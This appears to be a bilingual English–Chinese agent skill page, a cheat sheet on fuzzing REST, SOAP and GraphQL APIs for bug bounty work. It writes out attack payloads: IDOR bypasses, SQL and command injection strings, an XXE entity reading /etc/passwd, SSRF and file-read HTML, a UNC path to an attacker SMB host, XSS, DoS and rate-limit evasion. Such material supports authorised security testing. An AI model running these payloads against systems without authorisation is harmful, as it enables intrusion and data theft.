Back to Details

api-fuzzing-bug-bounty

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

API Fuzzing for Bug Bounty

漏洞众测中的API模糊测试

Purpose

目的

Provide comprehensive techniques for testing REST, SOAP, and GraphQL APIs during bug bounty hunting and penetration testing engagements. Covers vulnerability discovery, authentication bypass, IDOR exploitation, and API-specific attack vectors.
为漏洞众测和渗透测试场景下的REST、SOAP和GraphQL API提供全面的测试技术,涵盖漏洞发现、身份认证绕过、IDOR漏洞利用以及API专属攻击向量。

Inputs/Prerequisites

输入/前置条件

  • Burp Suite or similar proxy tool
  • API wordlists (SecLists, api_wordlist)
  • Understanding of REST/GraphQL/SOAP protocols
  • Python for scripting
  • Target API endpoints and documentation (if available)
  • Burp Suite或类似代理工具
  • API字典列表(SecLists、api_wordlist)
  • 了解REST/GraphQL/SOAP协议
  • Python脚本编写能力
  • 目标API端点及文档(如有)

Outputs/Deliverables

输出/交付物

  • Identified API vulnerabilities
  • IDOR exploitation proofs
  • Authentication bypass techniques
  • SQL injection points
  • Unauthorized data access documentation
  • 已识别的API漏洞
  • IDOR漏洞利用证明
  • 身份认证绕过技术
  • SQL注入点
  • 未授权数据访问文档

API Types Overview

API类型概述

TypeProtocolData FormatStructure
SOAPHTTPXMLHeader + Body
RESTHTTPJSON/XML/URLDefined endpoints
GraphQLHTTPCustom QuerySingle endpoint
类型协议数据格式结构
SOAPHTTPXML头部 + 主体
RESTHTTPJSON/XML/URL已定义端点
GraphQLHTTP自定义查询单一端点

Core Workflow

核心工作流程

Step 1: API Reconnaissance

步骤1:API侦察

Identify API type and enumerate endpoints:
bash
undefined
识别API类型并枚举端点:
bash
undefined

Check for Swagger/OpenAPI documentation

检查Swagger/OpenAPI文档

/swagger.json /openapi.json /api-docs /v1/api-docs /swagger-ui.html
/swagger.json /openapi.json /api-docs /v1/api-docs /swagger-ui.html

Use Kiterunner for API discovery

使用Kiterunner进行API发现

kr scan https://target.com -w routes-large.kite
kr scan https://target.com -w routes-large.kite

Extract paths from Swagger

从Swagger中提取路径

python3 json2paths.py swagger.json
undefined
python3 json2paths.py swagger.json
undefined

Step 2: Authentication Testing

步骤2:身份认证测试

bash
undefined
bash
undefined

Test different login paths

测试不同登录路径

/api/mobile/login /api/v3/login /api/magic_link /api/admin/login
/api/mobile/login /api/v3/login /api/magic_link /api/admin/login

Check rate limiting on auth endpoints

检查认证端点的速率限制

If no rate limit → brute force possible

若无速率限制 → 可尝试暴力破解

Test mobile vs web API separately

分别测试移动端与Web端API

Don't assume same security controls

不要假设两者安全控制相同

undefined
undefined

Step 3: IDOR Testing

步骤3:IDOR测试

Insecure Direct Object Reference is the most common API vulnerability:
bash
undefined
不安全直接对象引用(IDOR)是最常见的API漏洞:
bash
undefined

Basic IDOR

基础IDOR测试

GET /api/users/1234 → GET /api/users/1235
GET /api/users/1234 → GET /api/users/1235

Even if ID is email-based, try numeric

即使ID是基于邮箱的,也尝试数字形式

/?user_id=111 instead of /?user_id=user@mail.com
/?user_id=111 替代 /?user_id=user@mail.com

Test /me/orders vs /user/654321/orders

测试 /me/orders 与 /user/654321/orders


**IDOR Bypass Techniques:**

```bash

**IDOR绕过技术:**

```bash

Wrap ID in array

将ID包裹在数组中

{"id":111} → {"id":[111]}
{"id":111} → {"id":[111]}

JSON wrap

JSON嵌套包裹

{"id":111} → {"id":{"id":111}}
{"id":111} → {"id":{"id":111}}

Send ID twice

重复发送ID参数

URL?id=<LEGIT>&id=<VICTIM>
URL?id=<LEGIT>&id=<VICTIM>

Wildcard injection

通配符注入

{"user_id":"*"}
{"user_id":"*"}

Parameter pollution

参数污染

/api/get_profile?user_id=<victim>&user_id=<legit> {"user_id":<legit_id>,"user_id":<victim_id>}
undefined
/api/get_profile?user_id=<victim>&user_id=<legit> {"user_id":<legit_id>,"user_id":<victim_id>}
undefined

Step 4: Injection Testing

步骤4:注入测试

SQL Injection in JSON:
json
{"id":"56456"}                    → OK
{"id":"56456 AND 1=1#"}           → OK  
{"id":"56456 AND 1=2#"}           → OK
{"id":"56456 AND 1=3#"}           → ERROR (vulnerable!)
{"id":"56456 AND sleep(15)#"}     → SLEEP 15 SEC
Command Injection:
bash
undefined
JSON中的SQL注入:
json
{"id":"56456"}                    → 正常
{"id":"56456 AND 1=1#"}           → 正常  
{"id":"56456 AND 1=2#"}           → 正常
{"id":"56456 AND 1=3#"}           → 错误(存在漏洞!)
{"id":"56456 AND sleep(15)#"}     → 延迟15
命令注入:
bash
undefined

Ruby on Rails

Ruby on Rails环境

?url=Kernel#open → ?url=|ls
?url=Kernel#open → ?url=|ls

Linux command injection

Linux命令注入

api.url.com/endpoint?name=file.txt;ls%20/

**XXE Injection:**

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
SSRF via API:
html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
.NET Path.Combine Vulnerability:
bash
undefined
api.url.com/endpoint?name=file.txt;ls%20/

**XXE注入:**

```xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
通过API实现SSRF:
html
<object data="http://127.0.0.1:8443"/>
<img src="http://127.0.0.1:445"/>
.NET Path.Combine漏洞:
bash
undefined

If .NET app uses Path.Combine(path_1, path_2)

如果.NET应用使用Path.Combine(path_1, path_2)

Test for path traversal

测试路径遍历

https://example.org/download?filename=a.png https://example.org/download?filename=C:\inetpub\wwwroot\web.config https://example.org/download?filename=\\smb.dns.attacker.com\a.png
undefined
https://example.org/download?filename=a.png https://example.org/download?filename=C:\inetpub\wwwroot\web.config https://example.org/download?filename=\\smb.dns.attacker.com\a.png
undefined

Step 5: Method Testing

步骤5:请求方法测试

bash
undefined
bash
undefined

Test all HTTP methods

测试所有HTTP方法

GET /api/v1/users/1 POST /api/v1/users/1 PUT /api/v1/users/1 DELETE /api/v1/users/1 PATCH /api/v1/users/1
GET /api/v1/users/1 POST /api/v1/users/1 PUT /api/v1/users/1 DELETE /api/v1/users/1 PATCH /api/v1/users/1

Switch content type

切换内容类型

Content-Type: application/json → application/xml

---
Content-Type: application/json → application/xml

---

GraphQL-Specific Testing

GraphQL专属测试

Introspection Query

自省查询

Fetch entire backend schema:
graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
URL-encoded version:
/graphql?query={__schema{types{name,kind,description,fields{name}}}}
获取完整后端架构:
graphql
{__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,args{name,type{name,kind}}}}}}
URL编码版本:
/graphql?query={__schema{types{name,kind,description,fields{name}}}}

GraphQL IDOR

GraphQL IDOR测试

graphql
undefined
graphql
undefined

Try accessing other user IDs

尝试访问其他用户ID

query { user(id: "OTHER_USER_ID") { email password creditCard } }
undefined
query { user(id: "OTHER_USER_ID") { email password creditCard } }
undefined

GraphQL SQL/NoSQL Injection

GraphQL SQL/NoSQL注入

graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}
graphql
mutation {
  login(input: {
    email: "test' or 1=1--"
    password: "password"
  }) {
    success
    jwt
  }
}

Rate Limit Bypass (Batching)

速率限制绕过(批量请求)

graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}
graphql
mutation {login(input:{email:"a@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"b@example.com" password:"password"}){success jwt}}
mutation {login(input:{email:"c@example.com" password:"password"}){success jwt}}

GraphQL DoS (Nested Queries)

GraphQL拒绝服务(嵌套查询)

graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}
graphql
query {
  posts {
    comments {
      user {
        posts {
          comments {
            user {
              posts { ... }
            }
          }
        }
      }
    }
  }
}

GraphQL XSS

GraphQL XSS测试

bash
undefined
bash
undefined

XSS via GraphQL endpoint

通过GraphQL端点实现XSS

http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}
http://target.com/graphql?query={user(name:"<script>alert(1)</script>"){id}}

URL-encoded XSS

URL编码后的XSS

http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
undefined
http://target.com/example?id=%C/script%E%Cscript%Ealert('XSS')%C/script%E
undefined

GraphQL Tools

GraphQL工具

ToolPurpose
GraphCrawlerSchema discovery
graphw00fFingerprinting
clairvoyanceSchema reconstruction
InQLBurp extension
GraphQLmapExploitation
工具用途
GraphCrawler架构发现
graphw00f指纹识别
clairvoyance架构重构
InQLBurp扩展插件
GraphQLmap漏洞利用

Endpoint Bypass Techniques

端点绕过技术

When receiving 403/401, try these bypasses:
bash
undefined
当收到403/401响应时,尝试以下绕过方法:
bash
undefined

Original blocked request

原始被拦截请求

/api/v1/users/sensitivedata → 403
/api/v1/users/sensitivedata → 403

Bypass attempts

绕过尝试

/api/v1/users/sensitivedata.json /api/v1/users/sensitivedata? /api/v1/users/sensitivedata/ /api/v1/users/sensitivedata?? /api/v1/users/sensitivedata%20 /api/v1/users/sensitivedata%09 /api/v1/users/sensitivedata# /api/v1/users/sensitivedata&details /api/v1/users/..;/sensitivedata

---
/api/v1/users/sensitivedata.json /api/v1/users/sensitivedata? /api/v1/users/sensitivedata/ /api/v1/users/sensitivedata?? /api/v1/users/sensitivedata%20 /api/v1/users/sensitivedata%09 /api/v1/users/sensitivedata# /api/v1/users/sensitivedata&details /api/v1/users/..;/sensitivedata

---

Output Exploitation

输出结果利用

PDF Export Attacks

PDF导出攻击

html
<!-- LFI via PDF export -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- SSRF via PDF export -->
<object data="http://127.0.0.1:8443"/>

<!-- Port scanning -->
<img src="http://127.0.0.1:445"/>

<!-- IP disclosure -->
<img src="https://iplogger.com/yourcode.gif"/>
html
<!-- 通过PDF导出实现本地文件包含(LFI) -->
<iframe src="file:///etc/passwd" height=1000 width=800>

<!-- 通过PDF导出实现SSRF -->
<object data="http://127.0.0.1:8443"/>

<!-- 端口扫描 -->
<img src="http://127.0.0.1:445"/>

<!-- IP泄露 -->
<img src="https://iplogger.com/yourcode.gif"/>

DoS via Limits

通过限制参数实现拒绝服务

bash
undefined
bash
undefined

Normal request

正常请求

/api/news?limit=100
/api/news?limit=100

DoS attempt

拒绝服务尝试

/api/news?limit=9999999999

---
/api/news?limit=9999999999

---

Common API Vulnerabilities Checklist

常见API漏洞检查清单

VulnerabilityDescription
API ExposureUnprotected endpoints exposed publicly
Misconfigured CachingSensitive data cached incorrectly
Exposed TokensAPI keys/tokens in responses or URLs
JWT WeaknessesWeak signing, no expiration, algorithm confusion
IDOR / BOLABroken Object Level Authorization
Undocumented EndpointsHidden admin/debug endpoints
Different VersionsSecurity gaps in older API versions
Rate LimitingMissing or bypassable rate limits
Race ConditionsTOCTOU vulnerabilities
XXE InjectionXML parser exploitation
Content Type IssuesSwitching between JSON/XML
HTTP Method TamperingGET→DELETE/PUT abuse
漏洞类型描述
API暴露未受保护的端点公开发布
缓存配置错误敏感数据被错误缓存
令牌泄露API密钥/令牌出现在响应或URL中
JWT缺陷签名强度弱、无过期时间、算法混淆
IDOR / BOLA对象级授权失效
未文档化端点隐藏的管理员/调试端点
多版本差异旧版API存在安全缺口
速率限制缺失缺少可绕过的速率限制
竞争条件时间检查与时间使用(TOCTOU)漏洞
XXE注入XML解析器漏洞利用
内容类型问题JSON与XML之间切换测试
HTTP方法篡改GET→DELETE/PUT等方法滥用

Quick Reference

快速参考

VulnerabilityTest PayloadRisk
IDORChange user_id parameterHigh
SQLi
' OR 1=1--
in JSON		Critical
Command Injection
; ls /
Critical
XXEDOCTYPE with ENTITYHigh
SSRFInternal IP in paramsHigh
Rate Limit BypassBatch requestsMedium
Method TamperingGET→DELETEHigh
漏洞类型测试载荷风险等级
IDOR修改user_id参数
SQL注入JSON中传入
' OR 1=1--
严重
命令注入
; ls /
严重
XXE注入包含ENTITY的DOCTYPE
SSRF参数中传入内部IP
速率限制绕过批量请求
请求方法篡改GET→DELETE

Tools Reference

工具参考

CategoryToolURL
API FuzzingFuzzapigithub.com/Fuzzapi/fuzzapi
API FuzzingAPI-fuzzergithub.com/Fuzzapi/API-fuzzer
API FuzzingAstragithub.com/flipkart-incubator/Astra
API Securityapicheckgithub.com/BBVA/apicheck
API DiscoveryKiterunnergithub.com/assetnote/kiterunner
API Discoveryopenapi_security_scannergithub.com/ngalongc/openapi_security_scanner
API ToolkitAPIKitgithub.com/API-Security/APIKit
API KeysAPI Guesserapi-guesser.netlify.app
GUIDGUID Guessergist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18
GraphQLInQLgithub.com/doyensec/inql
GraphQLGraphCrawlergithub.com/gsmith257-cyber/GraphCrawler
GraphQLgraphw00fgithub.com/dolevf/graphw00f
GraphQLclairvoyancegithub.com/nikitastupin/clairvoyance
GraphQLbatchqlgithub.com/assetnote/batchql
GraphQLgraphql-copgithub.com/dolevf/graphql-cop
WordlistsSecListsgithub.com/danielmiessler/SecLists
Swagger ParserSwagger-EZrhinosecuritylabs.github.io/Swagger-EZ
Swagger Routesswagroutesgithub.com/amalmurali47/swagroutes
API MindmapMindAPIdsopas.github.io/MindAPI/play
JSON Pathsjson2pathsgithub.com/s0md3v/dump/tree/master/json2paths
分类工具地址
API模糊测试Fuzzapigithub.com/Fuzzapi/fuzzapi
API模糊测试API-fuzzergithub.com/Fuzzapi/API-fuzzer
API模糊测试Astragithub.com/flipkart-incubator/Astra
API安全apicheckgithub.com/BBVA/apicheck
API发现Kiterunnergithub.com/assetnote/kiterunner
API发现openapi_security_scannergithub.com/ngalongc/openapi_security_scanner
API工具包APIKitgithub.com/API-Security/APIKit
API密钥API Guesserapi-guesser.netlify.app
GUIDGUID Guessergist.github.com/DanaEpp/8c6803e542f094da5c4079622f9b4d18
GraphQLInQLgithub.com/doyensec/inql
GraphQLGraphCrawlergithub.com/gsmith257-cyber/GraphCrawler
GraphQLgraphw00fgithub.com/dolevf/graphw00f
GraphQLclairvoyancegithub.com/nikitastupin/clairvoyance
GraphQLbatchqlgithub.com/assetnote/batchql
GraphQLgraphql-copgithub.com/dolevf/graphql-cop
字典列表SecListsgithub.com/danielmiessler/SecLists
Swagger解析器Swagger-EZrhinosecuritylabs.github.io/Swagger-EZ
Swagger路由swagroutesgithub.com/amalmurali47/swagroutes
API思维导图MindAPIdsopas.github.io/MindAPI/play
JSON路径提取json2pathsgithub.com/s0md3v/dump/tree/master/json2paths

Constraints

约束条件

Must:
  • Test mobile, web, and developer APIs separately
  • Check all API versions (/v1, /v2, /v3)
  • Validate both authenticated and unauthenticated access
Must Not:
  • Assume same security controls across API versions
  • Skip testing undocumented endpoints
  • Ignore rate limiting checks
Should:
  • Add 
    X-Requested-With: XMLHttpRequest
    header to simulate frontend
  • Check archive.org for historical API endpoints
  • Test for race conditions on sensitive operations
必须:
  • 分别测试移动端、Web端和开发者API
  • 检查所有API版本(/v1、/v2、/v3)
  • 验证已认证和未认证两种访问场景
禁止:
  • 假设不同API版本的安全控制相同
  • 跳过未文档化端点的测试
  • 忽略速率限制检查
建议:
  • 添加
    X-Requested-With: XMLHttpRequest
    头部以模拟前端请求
  • 检查archive.org获取历史API端点
  • 测试敏感操作的竞争条件

Examples

示例

Example 1: IDOR Exploitation

示例1:IDOR漏洞利用

bash
undefined
bash
undefined

Original request (own data)

原始请求(自身数据)

GET /api/v1/invoices/12345 Authorization: Bearer <token>
GET /api/v1/invoices/12345 Authorization: Bearer <token>

Modified request (other user's data)

修改后的请求(其他用户数据)

GET /api/v1/invoices/12346 Authorization: Bearer <token>
GET /api/v1/invoices/12346 Authorization: Bearer <token>

Response reveals other user's invoice data

响应返回其他用户的发票数据

undefined
undefined

Example 2: GraphQL Introspection

示例2:GraphQL自省查询

bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'
bash
curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{__schema{types{name,fields{name}}}}"}'

Troubleshooting

故障排除

IssueSolution
API returns nothingAdd 
X-Requested-With: XMLHttpRequest
header
401 on all endpointsTry adding 
?user_id=1
parameter
GraphQL introspection disabledUse clairvoyance for schema reconstruction
Rate limitedUse IP rotation or batch requests
Can't find endpointsCheck Swagger, archive.org, JS files
问题解决方案
API无返回内容添加
X-Requested-With: XMLHttpRequest
头部
所有端点返回401尝试添加
?user_id=1
参数
GraphQL自省被禁用使用clairvoyance重构架构
被速率限制使用IP轮换或批量请求
无法找到端点检查Swagger、archive.org、JS文件

When to Use

使用场景

This skill is applicable to execute the workflow or actions described in the overview.
当需要执行概述中描述的工作流程或操作时,适用本技能。